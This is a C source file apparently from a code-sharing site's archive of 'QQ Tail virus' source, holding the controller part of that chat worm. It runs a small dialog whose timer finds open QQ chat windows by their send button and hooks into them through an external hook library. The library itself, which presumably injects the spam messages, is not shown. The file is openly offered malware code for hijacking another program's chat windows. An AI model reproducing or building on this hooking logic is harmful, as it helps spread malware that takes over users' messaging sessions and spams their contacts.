www.pudn.com > “QQ尾巴病毒”分析源代码.zip > QQTail.c
#include#include "..\Hook\Hook.h" #pragma comment(lib, "Hook.lib") #include "resource.h" #define ID_MYTIMER 419 // 计时器ID BOOL g_bStart; HWND g_hQQ; LRESULT CALLBACK ProcMain(HWND hDlg, UINT Msg, WPARAM wParam, LPARAM lParam) { switch (Msg) { case WM_CLOSE: AnimateWindow(hDlg, 800, AW_HIDE | AW_SLIDE | AW_VER_POSITIVE); EndDialog(hDlg, 0); break; case WM_COMMAND: { if (LOWORD(wParam) == IDC_BTN_CONTROL) { g_bStart = !g_bStart; SetDlgItemText(hDlg, IDC_BTN_CONTROL, g_bStart ? "停止" : "开始"); if (g_bStart) SetTimer(hDlg, ID_MYTIMER, 1000, NULL); else { KillTimer(hDlg, ID_MYTIMER); SetHook(NULL); } } if (LOWORD(wParam) == IDC_BTN_EXIT) SendMessage(hDlg, WM_CLOSE, 0, 0); } break; case WM_DESTROY: PostQuitMessage(0); break; case WM_INITDIALOG: { int x, y; RECT rect; g_bStart = FALSE; GetWindowRect(hDlg, &rect); x = GetSystemMetrics(SM_CXSCREEN) - rect.right + rect.left; y = GetSystemMetrics(SM_CYMAXIMIZED) - rect.bottom + rect.top - 10; SetWindowPos(hDlg, HWND_TOPMOST, x, y, 0, 0, SWP_NOSIZE | SWP_NOZORDER); AnimateWindow(hDlg, 800, AW_SLIDE | AW_VER_NEGATIVE); } break; case WM_TIMER: { if (!IsWindow(g_hQQ)) { // 感谢好友hottey的查找代码,省去了我使用Spy++的麻烦 HWND hSend; g_hQQ = NULL; SetHook(NULL); do { g_hQQ = FindWindowEx(NULL, g_hQQ, "#32770", NULL); hSend = FindWindowEx(g_hQQ, NULL, "Button", "发送(&S)"); } while(g_hQQ != NULL && hSend == NULL); if (g_hQQ != NULL) SetHook(g_hQQ); } } break; } return 0; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) { DialogBoxParam(hInstance, MAKEINTRESOURCE(IDD_DIALOG), NULL, (DLGPROC)ProcMain, 0); return 0; }